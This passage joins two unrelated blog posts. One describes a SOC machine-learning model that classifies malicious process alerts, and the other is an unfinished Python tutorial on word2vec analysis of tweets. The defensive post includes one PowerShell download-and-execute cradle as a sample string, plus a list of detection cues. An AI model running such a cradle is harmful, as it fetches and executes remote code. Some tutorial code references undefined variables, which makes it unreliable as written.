  • Process MD5
  • Parent Process
  • Process Command Arguments

While this may initially seem like a limited feature space, there is a lot of useful information that one can extract from these fields.

Beginning with the process path of, say, “C:\windows\temp\m.exe”, an analyst can immediately see some features:

  • The process resides in a temporary folder: C:\windows\temp\
  • The process is two directories deep in the file system
  • The process executable name is one character long
  • The process has an .exe extension
  • The process is not a “common” process name

While these may seem simple, over a vast amount of data and examples, extracting these bits of information will help the model to differentiate between events. Even the most basic aspects of an artifact must be captured in order to “teach” the model to view processes the way an analyst does.

The features are then encoded into a more discrete representation, similar to this:

  • Temp_folder: TRUE
  • Depth: 2
  • Name_Length: 1
  • Extension: exe
  • common_process_name: FALSE

Another important feature to consider about a process execution event is the combination of parent process and child process. Deviation from expected “lineage” can be a strong indicator of malicious activity.

Say the parent process of the aforementioned example was ‘powershell.exe’. Potential new features could then be derived from the concatenation of the parent process and the process itself: ‘powershell.exe_m.exe’. This functionally serves as an identity for the parent-child relation and captures another key analysis artifact.
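A rough sketch of what this kind of feature extraction could look like in Python (the feature names and the list of “common” process names are illustrative, not our production feature set):

import ntpath

COMMON_PROCESS_NAMES = {"svchost.exe", "explorer.exe", "services.exe"}  # illustrative only

def extract_process_features(process_path, parent_process):
  # Turn a process path and its parent process into a flat feature dictionary.
  directory, exe_name = ntpath.split(process_path.lower())
  name, extension = ntpath.splitext(exe_name)
  return {
    "temp_folder": "\\temp" in directory,
    "depth": directory.count("\\"),
    "name_length": len(name),
    "extension": extension.lstrip("."),
    "common_process_name": exe_name in COMMON_PROCESS_NAMES,
    "parent_child": parent_process.lower() + "_" + exe_name,
  }

print(extract_process_features("C:\\windows\\temp\\m.exe", "powershell.exe"))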

The richest field, however, is probably the process arguments. Process arguments are a language of their own, and language analysis is well-trodden ground in predictive analytics.

We can look for things including, but not limited to:

  • Network connection strings (such as ‘http://’, ‘https://’, ‘ftp://’).
  • Base64 encoded commands
  • Reference to Registry Keys (‘HKLM’, ‘HKCU’)
  • Evidence of obfuscation (ticks, $, semicolons) (read Daniel Bohannon’s work for more)

The way these features and their values appear in a training dataset will define the way the model learns. Based on the distribution of features across thousands of alerts, relationships will start to emerge between features and labels. These relationships will then be recorded in our model, and ultimately used to influence the predictions for new alerts. Looking at distributions of features in the training set can give insight into some of these potential relationships.

For example, Figure 2 shows how the distribution of Process Command Length may appear when grouping by malicious (red) and benign (blue).


Figure 2: Distribution of Process Event alerts grouped by Process Command Length

This graph shows that over a subset of samples, the longer the command length, the more likely it is to be malicious. This manifests as red on the right and blue on the left. However, process length is not the only factor.

As part of our feature set, we also thought it would be useful to approximate the “complexity” of each command. For this, we used “Shannon entropy”, a commonly used metric that measures the degree of randomness present in a string of characters.
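As a quick illustration, the Shannon entropy of a command string can be computed in a few lines of Python (a sketch, not our exact implementation; the sample commands are made up):

import math
from collections import Counter

def shannon_entropy(command):
  # Shannon entropy in bits per character: -sum(p * log2(p)) over character frequencies.
  if not command:
    return 0.0
  total = float(len(command))
  return -sum((n / total) * math.log(n / total, 2) for n in Counter(command).values())

print(shannon_entropy("ipconfig /all"))  # relatively low entropy
print(shannon_entropy("iex((new-object net.webclient).downloadstring('http://x/y?z=JABzAD0A'))"))  # relatively high entropy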

Figure 3 shows a distribution of command entropy, broken out into malicious and benign. While the classes do not separate entirely, we can see that for this sample of data, samples with higher entropy generally have a higher chance of being malicious.


Figure 3: Distribution of Process Event alerts grouped by entropy

Model Selection and Generalization

Once features have been generated for the whole dataset, it is time to use them to train a model. There is no perfect procedure for picking the best model, but looking at the type of features in our data can help narrow it down. In the case of a process event, we have a combination of features represented as strings and numbers. When an analyst evaluates each artifact, they ask questions about each of these features, and combine the answers to estimate the probability that the process is malicious.

For our use case, it also made sense to prioritize an ‘interpretable’ model – that is, one that can more easily expose why it made a certain decision about an artifact. This way analysts can build confidence in the model, as well as detect and fix analytical mistakes that the model is making. Given the nature of the data, the decisions analysts make, and the desire for interpretability, we felt that a decision tree-based model would be well-suited for alert classification.

There are many publicly available resources to learn about decision trees, but the basic intuition behind a decision tree is that it is an iterative process, asking a series of questions to try to arrive at a highly confident answer. Anyone who has played the game “Twenty Questions” is familiar with this concept. Initially, general questions are asked to help eliminate possibilities, and then more specific questions are asked to narrow down the possibilities. After enough questions are asked and answered, the ‘questioner’ feels they have a high probability of guessing the right answer.

Figure 4 shows an example of a decision tree that one might use to evaluate process executions.


Figure 4: Decision tree for deciding whether an alert is benign or malicious

For the example alert in the diagram, the “decision path” is marked in red. This is how this decision tree model makes a prediction. It first asks: “Is the length greater than 100 characters?” If so, it moves to the next question “Does it contain the string ‘http’?” and so on until it feels confident in making an educated guess. In the example in Figure 4, given that 95 percent of all the training alerts traveling this decision path were malicious, the model predicts a 95 percent chance that this alert will also be malicious.

Because they can ask such detailed combinations of questions, it is possible that decision trees can “overfit”, or learn rules that are too closely tied to the training set. This reduces the model’s ability to “generalize” to new data. One way to mitigate this effect is to use many slightly different decision trees and have them each “vote” on the outcome. This “ensemble” of decision trees is called a Random Forest, and it can improve performance for the model when deployed in the wild. This is the algorithm we ultimately chose for our model.
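As an illustrative sketch of this setup (here using scikit-learn, with a handful of the example features from earlier; the training values are made up, not our production data):

from sklearn.ensemble import RandomForestClassifier

# Columns: temp_folder, path_depth, name_length, command_length, command_entropy
X_train = [
  [1, 2, 1, 240, 5.1],   # malicious
  [0, 4, 7, 35, 3.2],    # benign
  [1, 3, 2, 180, 4.8],   # malicious
  [0, 5, 11, 20, 2.9],   # benign
]
y_train = [1, 0, 1, 0]

model = RandomForestClassifier(n_estimators=100, random_state=0)
model.fit(X_train, y_train)

# Probability that a new alert is malicious, as voted by the ensemble of trees.
new_alert = [[1, 2, 1, 103, 5.08]]
print(model.predict_proba(new_alert)[0][1])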

How the SOC Alert Model Works

When a new alert appears, the data in the artifact is transformed into a vector of the encoded features, with the same structure as the feature representations used to train the model. The model then evaluates this “feature vector” and applies a confidence level for the predicted label. Based on thresholds we set, we can then classify the alert as malicious or benign.


Figure 5: An alert presented to the analyst with its raw values captured

As an example, the event shown in Figure 5 might create the following feature values:

  • Parent Process: ‘wscript’
  • Command Entropy: 5.08
  • Command Length: 103

Based on how they were trained, the trees in the model each ask a series of questions of the new feature vector. As the feature vector traverses each tree, it eventually converges on a terminal “leaf” classifying it as either benign or malicious. We can then evaluate the aggregated decisions made by each tree to estimate which features in the vector played the largest role in the ultimate classification.

For the analysts in the SOC, we then present the features extracted from the model, showing the distribution of those features over the entire dataset. This gives the analysts insight into “why” the model thought what it thought, and how those features are represented across all alerts we have seen. For example, the “explanation” for this alert might look like:

  • Command Entropy = 5.08 > 4.60:  51.73% Threat
  • occuranceOfChar “\”= 9.00 > 4.50:  64.09% Threat
  • occuranceOfChar:“)” (=0.00) <= 0.50: 78.69% Threat
  • NOT processTree=”cmd.exe_to_cscript.exe”: 99.6% Threat

Thus, at the time of analysis, the analysts can see the raw data of the event, the prediction from the model, an approximation of the decision path, and a simplified, interpretable view of the overall feature importance.
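With scikit-learn, a crude approximation of this kind of explanation can be pulled from the trained forest itself – globally via feature importances, and locally via a tree’s decision path. The sketch below reuses the made-up feature names and training values from the earlier snippet; our production explanation logic is more involved:

import numpy as np
from sklearn.ensemble import RandomForestClassifier

feature_names = ["temp_folder", "path_depth", "name_length", "command_length", "command_entropy"]
X_train = np.array([[1, 2, 1, 240, 5.1], [0, 4, 7, 35, 3.2],
                    [1, 3, 2, 180, 4.8], [0, 5, 11, 20, 2.9]])  # made-up values
y_train = [1, 0, 1, 0]
model = RandomForestClassifier(n_estimators=100, random_state=0).fit(X_train, y_train)
new_alert = np.array([[1, 2, 1, 103, 5.08]])

# Global view: which features the forest relies on most, across all trees.
for name, importance in sorted(zip(feature_names, model.feature_importances_), key=lambda x: -x[1]):
  print(name + ": " + str(round(importance, 3)))

# Local view: the split decisions along the first tree's path for this alert.
tree = model.estimators_[0].tree_
for node_id in model.estimators_[0].decision_path(new_alert).indices:
  if tree.children_left[node_id] != tree.children_right[node_id]:  # internal node, not a leaf
    print(feature_names[tree.feature[node_id]] + " <= " + str(round(float(tree.threshold[node_id]), 2)))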

How the SOC Uses the Model

Showing the features the model used to reach the conclusion allows experienced analysts to compare their approach with the model, and give feedback if the model is doing something wrong. Conversely, a new analyst may learn to look at features they may have otherwise missed: the parent-child relationship, signs of obfuscation, or network connection strings in the arguments. After all, the model has learned on the collective experience of every analyst over thousands of alerts. Therefore, the model provides an actionable reflection of the aggregate analyst experience back to the SOC, so that each analyst can transitively learn from their colleagues.

Additionally, it is possible to write rules using the output of the model as a parameter. If the model is particularly confident on a subset of alerts, and the SOC feels comfortable automatically classifying that family of threats, it is possible to simply write a rule to say: “If the alert is of this type, AND for this malware family, AND the model confidence is above 99, automatically call this alert bad and generate a report.” Or, if there is a storm of probable false positives, one could write a rule to cull the herd of false positives using a model score below 10.
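Conceptually, such a rule layer sitting on top of the model output might look like the following Python sketch (field names, family name, and thresholds are hypothetical):

def triage(alert, model_score):
  # Hypothetical post-model rule layer; model_score is on a 0-100 scale.
  if alert["type"] == "process_event" and alert["family"] == "known_commodity_family" and model_score > 99:
    return "auto-classify as malicious and generate report"
  if model_score < 10:
    return "auto-suppress as probable false positive"
  return "send to analyst for review"

print(triage({"type": "process_event", "family": "known_commodity_family"}, 99.5))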

How the Model Stays Effective

The day the model is trained, it stops learning. However, threats – and therefore alerts – are constantly evolving. Thus, it is imperative to continually retrain the model with new alert data to ensure it continues to learn from changes in the environment.

Additionally, it is critical to monitor the overall efficacy of the model over time. Building an efficacy analysis pipeline to compare model results against analyst feedback will help identify if the model is beginning to drift or develop structural biases. Evaluating and incorporating analyst feedback is also critical to identify and address specific misclassifications, and discover potential new features that may be necessary.

To accomplish these goals, we run a background job that updates our training database with newly labeled events. As we get more and more alerts, we periodically retrain our model with the new observations. If we encounter issues with accuracy, we diagnose and work to address them. Once we are satisfied with the overall accuracy score of our retrained model, we store the model object and begin using that model version.

We also provide a feedback mechanism for analysts to record when the model is wrong. An analyst can look at the label provided by the model and the explanation, but can also make their own decision. Whether they agree with the model or not, they can input their own label through the interface. We store the analyst’s label along with any optional explanation they provide for their decision.

Finally, it should be noted that these manual labels may require further evaluation. As an example, consider a commodity malware alert, in which network command and control communications were sinkholed. An analyst may evaluate the alert, pull back triage details, including PCAP samples, and see that while the malware executed, the true threat to the environment was mitigated. Since it does not represent an exigent threat, the analyst may mark this alert as ‘benign’. However, the fact that it was sinkholed does not change that the artifacts of execution still represent malicious activity. Under different circumstances, this infection could have had a negative impact on the organization. However, if the benign label is used when retraining the model, that will teach the model that something inherently malicious is in fact benign, and potentially lead to false negatives in the future.

Monitoring efficacy over time, updating and retraining the model with new alerts, and evaluating manual analyst feedback gives us visibility into how the model is performing and learning over time. Ultimately this helps to build confidence in the model, so we can automate more tasks and free up analyst time to perform tasks such as hunting and investigation.

Conclusion

A supervised learning model is not a replacement for an experienced analyst. However, incorporating predictive analytics and machine learning into the SOC workflow can help augment the productivity of analysts, free up time, and ensure they utilize investigative skills and creativity on the threats that truly require expertise.

This blog post outlines the major components and considerations of building an alert classification model for the SOC. Data collection, labeling, feature generation, model training, and efficacy analysis must all be carefully considered when building such a model. FireEye continues to iterate on this research to improve our detection and response capabilities, continually improve the detection efficacy of our products, and ultimately protect our clients.

The process and examples discussed in this post are not mere research. Within our FireEye Managed Defense SOC, we use alert classification models built using the aforementioned processes to increase our efficiency and ensure we apply our analysts’ expertise where it is needed most. In a world of ever-increasing threats and alerts, increasing SOC efficiency may mean the difference between missing and catching a critical intrusion.

Acknowledgements

A big thank you to Seth Summersett and Clara Brooks.

***

The FireEye ICE Data Science Team is a small, highly trained team of data scientists and engineers, focused on delivering impactful capabilities to our analysts, products, and customers. ICE-DS is always looking for exceptional candidates interested in researching and solving difficult problems in cybersecurity. If you’re interested, check out  FireEye careers.

NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely:

“Word2vec takes as its input a large corpus of text and produces a vector space, typically of several hundred dimensions, with each unique word in the corpus being assigned a corresponding vector in the space. Word vectors are positioned in the vector space such that words that share common contexts in the corpus are located in close proximity to one another in the space.”

During the two weeks leading up to the  January 2018 Finnish presidential elections, I performed an analysis of user interactions and behavior on Twitter, based on search terms relevant to that event. During the course of that analysis, I also dumped each Tweet’s raw text field to a text file, one item per line. I then wrote a small tool designed to preprocess the collected Tweets, feed that processed data into word2vec, and finally output some visualizations. Since word2vec creates multidimensional tensors, I’m using T-SNE for dimensionality reduction (the resulting visualizations are in two dimensions, compared to the 200 dimensions of the original data.)

The rest of this blog post will be devoted to listing and explaining the code used to perform these tasks. I’ll present the code as it appears in the tool. The code starts with a set of functions that perform processing and visualization tasks. The main routine at the end wraps everything up by calling each routine sequentially, passing artifacts from the previous step to the next one. As such, you can copy-paste each section of code into an editor, save the resulting file, and the tool should run (assuming you’ve pip installed all dependencies.) Note that I’m using two spaces per indent purely to allow the code to format neatly in this blog. Let’s start, as always, with importing dependencies. Off the top of my head, you’ll probably want to install tensorflow, gensim, six, numpy, matplotlib, and sklearn (although I think some of these install as part of tensorflow’s installation).

# -*- coding: utf-8 -*-
from tensorflow.contrib.tensorboard.plugins import projector
from sklearn.manifold import TSNE
from collections import Counter
from six.moves import cPickle
import gensim.models.word2vec as w2v
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
import multiprocessing
import os
import sys
import io
import re
import json

The next listing contains a few helper functions. In each processing step, I like to save the output. I do this for two reasons. Firstly, depending on the size of your raw data, each step can take some time. Hence, if you’ve performed the step once, and saved the output, it can be loaded from disk to save time on subsequent passes. The second reason for saving each step is so that you can examine the output to check that it looks like what you want. The try_load_or_process() function attempts to load the previously saved output from a function. If it doesn’t exist, it runs the function and then saves the output. Note also the rather odd looking implementation in save_json(). This is a workaround for the fact that json.dump() errors out on certain non-ascii characters when paired with io.open().

def try_load_or_process(filename, processor_fn, function_arg):
  load_fn = None
  save_fn = None
  if filename.endswith("json"):
    load_fn = load_json
    save_fn = save_json
  else:
    load_fn = load_bin
    save_fn = save_bin
  if os.path.exists(filename):
    return load_fn(filename)
  else:
    ret = processor_fn(function_arg)
    save_fn(ret, filename)
    return ret

def print_progress(current, maximum):
  sys.stdout.write("\r")
  sys.stdout.flush()
  sys.stdout.write(str(current) + "/" + str(maximum))
  sys.stdout.flush()

def save_bin(item, filename):
  with open(filename, "wb") as f:
    cPickle.dump(item, f)

def load_bin(filename):
  if os.path.exists(filename):
    with open(filename, "rb") as f:
      return cPickle.load(f)

def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
  ret = None
  if os.path.exists(filename):
    try:
      with io.open(filename, "r", encoding="utf-8") as f:
        ret = json.load(f)
    except:
      pass
  return ret

Moving on, let’s look at the first preprocessing step. This function takes the raw text strings dumped from Tweets, removes unwanted characters and features (such as user names and URLs), removes duplicates, and returns a list of sanitized strings. Here, I’m not using string.printable for a list of characters to keep, since Finnish includes additional letters that aren’t part of the english alphabet (äöåÄÖÅ). The regular expressions used in this step have been somewhat tailored for the raw input data. Hence, you may need to tweak them for your own input corpus.

def process_raw_data(input_file):
  valid = u"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ#@.:/ äöåÄÖÅ"
  url_match = "(https?:\/\/[0-9a-zA-Z\-\_]+\.[\-\_0-9a-zA-Z]+\.?[0-9a-zA-Z\-\_]*\/?.*)"
  name_match = "\@[\_0-9a-zA-Z]+\:?"
  lines = []
  print("Loading raw data from: " + input_file)
  if os.path.exists(input_file):
    with io.open(input_file, 'r', encoding="utf-8") as f:
      lines = f.readlines()
  num_lines = len(lines)
  ret = []
  for count, text in enumerate(lines):
    if count % 50 == 0:
      print_progress(count, num_lines)
    text = re.sub(url_match, u"", text)
    text = re.sub(name_match, u"", text)
    text = re.sub("\&amp\;?", u"", text)
    text = re.sub("[\:\.]{1,}$", u"", text)
    text = re.sub("^RT\:?", u"", text)
    text = u''.join(x for x in text if x in valid)
    text = text.strip()
    if len(text.split()) > 5:
      if text not in ret:
        ret.append(text)
  return ret

The next step is to tokenize each sentence (or Tweet) into words.

def tokenize_sentences(sentences):
  ret = []
  max_s = len(sentences)
  print("Got " + str(max_s) + " sentences.")
  for count, s in enumerate(sentences):
    tokens = []
    words = re.split(r'(\s+)', s)
    if len(words) > 0:
      for w in words:
        if w is not None:
          w = w.strip()
          w = w.lower()
          if w.isspace() or w == "\n" or w == "\r":
            w = None
          if len(w) < 1:
            w = None
          if w is not None:
            tokens.append(w)
    if len(tokens) > 0:
      ret.append(tokens)
    if count % 50 == 0:
      print_progress(count, max_s)
  return ret

The final text preprocessing step removes unwanted tokens. This includes numeric data and stop words. Stop words are the most common words in a language. We omit them from processing in order to bring out the meaning of the text in our analysis. I downloaded a json dump of stop words for all languages from here, and placed it in the same directory as this script. If you plan on trying this code out yourself, you’ll need to perform the same steps. Note that I included extra stopwords of my own. After looking at the output of this step, I noticed that Twitter’s truncation of some tweets caused certain word fragments to occur frequently.

def clean_sentences(tokens):
  all_stopwords = load_json("stopwords-iso.json")
  extra_stopwords = ["ssä", "lle", "h.", "oo", "on", "muk", "kov", "km", "ia", "täm", "sy", "but", ":sta", "hi", "py", "xd", "rr", "x:", "smg", "kum", "uut", "kho", "k", "04n", "vtt", "htt", "väy", "kin", "#8", "van", "tii", "lt3", "g", "ko", "ett", "mys", "tnn", "hyv", "tm", "mit", "tss", "siit", "pit", "viel", "sit", "n", "saa", "tll", "eik", "nin", "nii", "t", "tmn", "lsn", "j", "miss", "pivn", "yhn", "mik", "tn", "tt", "sek", "lis", "mist", "tehd", "sai", "l", "thn", "mm", "k", "ku", "s", "hn", "nit", "s", "no", "m", "ky", "tst", "mut", "nm", "y", "lpi", "siin", "a", "in", "ehk", "h", "e", "piv", "oy", "p", "yh", "sill", "min", "o", "va", "el", "tyn", "na", "the", "tit", "to", "iti", "tehdn", "tlt", "ois", ":", "v", "?", "!", "&"]
  stopwords = None
  if all_stopwords is not None:
    stopwords = all_stopwords["fi"]
    stopwords += extra_stopwords
  ret = []
  max_s = len(tokens)
  for count, sentence in enumerate(tokens):
    if count % 50 == 0:
      print_progress(count, max_s)
    cleaned = []
    for token in sentence:
      if len(token) > 0:
        if stopwords is not None:
          for s in stopwords:
            if token == s:
              token = None
        if token is not None:
            if re.search("^[0-9\.\-\s\/]+$", token):
              token = None
        if token is not None:
            cleaned.append(token)
    if len(cleaned) > 0:
      ret.append(cleaned)
  return ret

The next function creates a vocabulary from the processed text. A vocabulary, in this context, is basically a list of all unique tokens in the data. This function creates a frequency distribution of all tokens (words) by counting the number of occurrences of each token. We will use this later to “trim” the vocabulary down to a manageable size.

def get_word_frequencies(corpus):
  frequencies = Counter()
  for sentence in corpus:
    for word in sentence:
      frequencies[word] += 1
  freq = frequencies.most_common()
  return freq

Now that we’re done with all the preprocessing steps, let’s get into the more interesting analysis functions. The following function accepts the tokenized and cleaned data generated from the steps above, and uses it to train a word2vec model. The num_features parameter sets the number of features each word is assigned (and hence the dimensionality of the resulting tensor). It is recommended to set it between 100 and 1000. Naturally, larger values take more processing power and memory/disk space to handle. I found 200 to be enough, but I normally start with a value of 300 when looking at new datasets. The min_count variable passed to word2vec designates how to trim the vocabulary. For example, if min_count is set to 3, all words that appear in the data set fewer than 3 times will be discarded from the vocabulary used when training the word2vec model. In the dimensionality reduction step we perform later, large vocabulary sizes cause T-SNE iterations to take a long time. Hence, I tuned min_count to generate a vocabulary of around 10,000 words. Increasing the value of sample will cause word2vec to randomly omit words with high frequency counts. I decided that I wanted to keep all of those words in my analysis, so it’s set to zero. Increasing epoch_count will cause word2vec to train for more iterations, which will, naturally, take longer. Increase this if you have a fast machine or plenty of time on your hands 🙂

def get_word2vec(sentences):
  num_workers = multiprocessing.cpu_count()
  num_features = 200
  epoch_count = 10
  sentence_count = len(sentences)
  w2v_file = os.path.join(save_dir, "word_vectors.w2v")
  word2vec = None
  if os.path.exists(w2v_file):
    print("w2v model loaded from " + w2v_file)
    word2vec = w2v.Word2Vec.load(w2v_file)
  else:
    word2vec = w2v.Word2Vec(sg=1,
                            seed=1,
                            workers=num_workers,
                            size=num_features,
                            min_count=min_frequency_val,
                            window=5,
                            sample=0)

    print("Building vocab...")
    word2vec.build_vocab(sentences)
    print("Word2Vec vocabulary length:", len(word2vec.wv.vocab))
    print("Training...")
    word2vec.train(sentences, total_examples=sentence_count, epochs=epoch_count)
    print("Saving model...")
    word2vec.save(w2v_file)
  return word2vec

Tensorboard has some good tools to visualize word embeddings in the word2vec model we just created. These visualizations can be accessed using the “projector” tab in the interface. Here’s code to create tensorboard embeddings:

def create_embeddings(word2vec):
  all_word_vectors_matrix = word2vec.wv.syn0
  num_words = len(all_word_vectors_matrix)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim = word2vec.wv[vocab[0]].shape[0]
  embedding = np.empty((num_words, dim), dtype=np.float32)
  metadata = ""
  for i, word in enumerate(vocab):
    embedding[i] = word2vec.wv[word]
    metadata += word + "\n"
  metadata_file = os.path.join(save_dir, "metadata.tsv")
  with io.open(metadata_file, "w", encoding="utf-8") as f:
    f.write(metadata)

  tf.reset_default_graph()
  sess = tf.InteractiveSession()
  X = tf.Variable([0.0], name='embedding')
  place = tf.placeholder(tf.float32, shape=embedding.shape)
  set_x = tf.assign(X, place, validate_shape=False)
  sess.run(tf.global_variables_initializer())
  sess.run(set_x, feed_dict={place: embedding})

  summary_writer = tf.summary.FileWriter(save_dir, sess.graph)
  config = projector.ProjectorConfig()
  embedding_conf = config.embeddings.add()
  embedding_conf.tensor_name = 'embedding:0'
  embedding_conf.metadata_path = 'metadata.tsv'
  projector.visualize_embeddings(summary_writer, config)

  save_file = os.path.join(save_dir, "model.ckpt")
  print("Saving session...")
  saver = tf.train.Saver()
  saver.save(sess, save_file)

Once this code has been run, tensorflow log entries will be created in save_dir. To start a tensorboard session, run the following command from the directory where this script was run:

tensorboard --logdir=save_dir

You should see output like the following once you’ve run the above command:

TensorBoard 0.4.0rc3 at http://node.local:6006 (Press CTRL+C to quit)

Navigate your web browser to localhost:<port_number> to see the interface. From the “Inactive” pulldown menu, select “Projector”.

tensorboard projector menu item

The “projector” menu is often hiding under the “inactive” pulldown.

Once you’ve selected “projector”, you should see a view like this:

Tensorboard's projector view

Tensorboard’s projector view allows you to interact with word embeddings, search for words, and even run t-sne on the dataset.

There are a lot of things to play around with in this view. You can search for words, fly around the embeddings, and even run t-sne (on the bottom left) on the dataset. If you get to this step, have fun playing with the interface!

And now, back to the code. One of word2vec’s most interesting functions is to find similarities between words. This is done via the word2vec.wv.most_similar() call. The following function calls word2vec.wv.most_similar() for a word and returns num-similar words. The returned value is a list containing the queried word, and a list of similar words. ( [queried_word, [similar_word1, similar_word2, …]] ).

def most_similar(input_word, num_similar):
  sim = word2vec.wv.most_similar(input_word, topn=num_similar)
  output = []
  found = []
  for item in sim:
    w, n = item
    found.append(w)
  output = [input_word, found]
  return output

The following function takes a list of words to be queried, passes them to the above function, saves the output, and also passes the queried words to t_sne_scatterplot(), which we’ll show later. It also writes a csv file – associations.csv – which can be imported into Gephi to generate graphing visualizations. You can see some Gephi-generated visualizations in the accompanying blog post.

I find that manually viewing the word2vec_test.json file generated by this function is a good way to read the list of similarities found for each word queried with wv.most_similar().

def test_word2vec(test_words):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  output = []
  associations = {}
  test_items = test_words
  for count, word in enumerate(test_items):
    if word in vocab:
      print("[" + str(count+1) + "] Testing: " + word)
      if word not in associations:
        associations[word] = []
      similar = most_similar(word, num_similar)
      t_sne_scatterplot(word)
      output.append(similar)
      for s in similar[1]:
        if s not in associations[word]:
          associations[word].append(s)
    else:
      print("Word " + word + " not in vocab")
  filename = os.path.join(save_dir, "word2vec_test.json")
  save_json(output, filename)
  filename = os.path.join(save_dir, "associations.json")
  save_json(associations, filename)
  filename = os.path.join(save_dir, "associations.csv")
  handle = io.open(filename, "w", encoding="utf-8")
  handle.write(u"Source,Target\n")
  for w, sim in associations.iteritems():
    for s in sim:
      handle.write(w + u"," + s + u"\n")
  return output

The next function implements standalone code for creating a scatterplot from the output of T-SNE on a set of data points obtained from a word2vec.wv.most_similar() query. The scatterplot is visualized with matplotlib. Unfortunately, my matplotlib skills leave a lot to be desired, and these graphs don’t look great. But they’re readable.

def t_sne_scatterplot(word):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim0 = word2vec.wv[vocab[0]].shape[0]
  arr = np.empty((0, dim0), dtype='f')
  w_labels = [word]
  nearby = word2vec.wv.similar_by_word(word, topn=num_similar)
  arr = np.append(arr, np.array([word2vec[word]]), axis=0)
  for n in nearby:
    w_vec = word2vec[n[0]]
    w_labels.append(n[0])
    arr = np.append(arr, np.array([w_vec]), axis=0)

  tsne = TSNE(n_components=2, random_state=1)
  np.set_printoptions(suppress=True)
  Y = tsne.fit_transform(arr)
  x_coords = Y[:, 0]
  y_coords = Y[:, 1]

  plt.rc("font", size=16)
  plt.figure(figsize=(16, 12), dpi=80)
  plt.scatter(x_coords[0], y_coords[0], s=800, marker="o", color="blue")
  plt.scatter(x_coords[1:], y_coords[1:], s=200, marker="o", color="red")

  for label, x, y in zip(w_labels, x_coords, y_coords):
    plt.annotate(label.upper(), xy=(x, y), xytext=(0, 0), textcoords='offset points')
  plt.xlim(x_coords.min()-50, x_coords.max()+50)
  plt.ylim(y_coords.min()-50, y_coords.max()+50)
  filename = os.path.join(plot_dir, word + "_tsne.png")
  plt.savefig(filename)
  plt.close()

In order to create a scatterplot of the entire vocabulary, we need to perform T-SNE over that whole dataset. This can be a rather time-consuming operation. The next function performs that operation, attempting to save and re-load intermediate steps (since some of them can take over 30 minutes to complete).

def calculate_t_sne():
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  arr = np.empty((0, dim0), dtype='f')
  labels = []
  vectors_file = os.path.join(save_dir, "vocab_vectors.npy")
  labels_file = os.path.join(save_dir, "labels.json")
  if os.path.exists(vectors_file) and os.path.exists(labels_file):
    print("Loading pre-saved vectors from disk")
    arr = load_bin(vectors_file)
    labels = load_json(labels_file)
  else:
    print("Creating an array of vectors for each word in the vocab")
    for count, word in enumerate(vocab):
      if count % 50 == 0:
        print_progress(count, vocab_len)
      w_vec = word2vec[word]
      labels.append(word)
      arr = np.append(arr, np.array([w_vec]), axis=0)
    save_bin(arr, vectors_file)
    save_json(labels, labels_file)

  x_coords = None
  y_coords = None
  x_c_filename = os.path.join(save_dir, "x_coords.npy")
  y_c_filename = os.path.join(save_dir, "y_coords.npy")
  if os.path.exists(x_c_filename) and os.path.exists(y_c_filename):
    print("Reading pre-calculated coords from disk")
    x_coords = load_bin(x_c_filename)
    y_coords = load_bin(y_c_filename)
  else:
    print("Computing T-SNE for array of length: " + str(len(arr)))
    tsne = TSNE(n_components=2, random_state=1, verbose=1)
    np.set_printoptions(suppress=True)
    Y = tsne.fit_transform(arr)
    x_coords = Y[:, 0]
    y_coords = Y[:, 1]
    print("Saving coords.")
    save_bin(x_coords, x_c_filename)
    save_bin(y_coords, y_c_filename)
  return x_coords, y_coords, labels, arr

The next function takes the data calculated in the above step, and data obtained from test_word2vec(), and plots the results from each word queried on the scatterplot of the entire vocabulary. These plots are useful for visualizing which words are closer to others, and where clusters commonly pop up. This is the last function before we get onto the main routine.

def show_cluster_locations(results, labels, x_coords, y_coords):
  for item in results:
    name = item[0]
    print("Plotting graph for " + name)
    similar = item[1]
    in_set_x = []
    in_set_y = []
    out_set_x = []
    out_set_y = []
    name_x = 0
    name_y = 0
    for count, word in enumerate(labels):
      xc = x_coords[count]
      yc = y_coords[count]
      if word == name:
        name_x = xc
        name_y = yc
      elif word in similar:
        in_set_x.append(xc)
        in_set_y.append(yc)
      else:
        out_set_x.append(xc)
        out_set_y.append(yc)
    plt.figure(figsize=(16, 12), dpi=80)
    plt.scatter(name_x, name_y, s=400, marker="o", c="blue")
    plt.scatter(in_set_x, in_set_y, s=80, marker="o", c="red")
    plt.scatter(out_set_x, out_set_y, s=8, marker=".", c="black")
    filename = os.path.join(big_plot_dir, name + "_tsne.png")
    plt.savefig(filename)
    plt.close()

Now let’s write our main routine, which will call all the above functions, process our collected Twitter data, and generate visualizations. The first few lines take care of our three preprocessing steps, and generation of a frequency distribution / vocabulary. The script expects the raw Twitter data to reside in a relative path (data/tweets.txt). Change those variables as needed. Also, all output is saved to a subdirectory in the relative path (analysis/). Again, tailor this to your needs.

if __name__ == '__main__':
  input_dir = "data"
  save_dir = "analysis"
  if not os.path.exists(save_dir):
    os.makedirs(save_dir)

  print("Preprocessing raw data")
  raw_input_file = os.path.join(input_dir, "tweets.txt")
  filename = os.path.join(save_dir, "data.json")
  processed = try_load_or_process(filename, process_raw_data, raw_input_file)
  print("Unique sentences: " + str(len(processed)))

  print("Tokenizing sentences")
  filename = os.path.join(save_dir, "tokens.json")
  tokens = try_load_or_process(filename, tokenize_sentences, processed)

  print("Cleaning tokens")
  filename = os.path.join(save_dir, "cleaned.json")
  cleaned = try_load_or_process(filename, clean_sentences, tokens)

  print("Getting word frequencies")
  filename = os.path.join(save_dir, "frequencies.json")
  frequencies = try_load_or_process(filename, get_word_frequencies, cleaned)
  vocab_size = len(frequencies)
  print("Unique words: " + str(vocab_size))

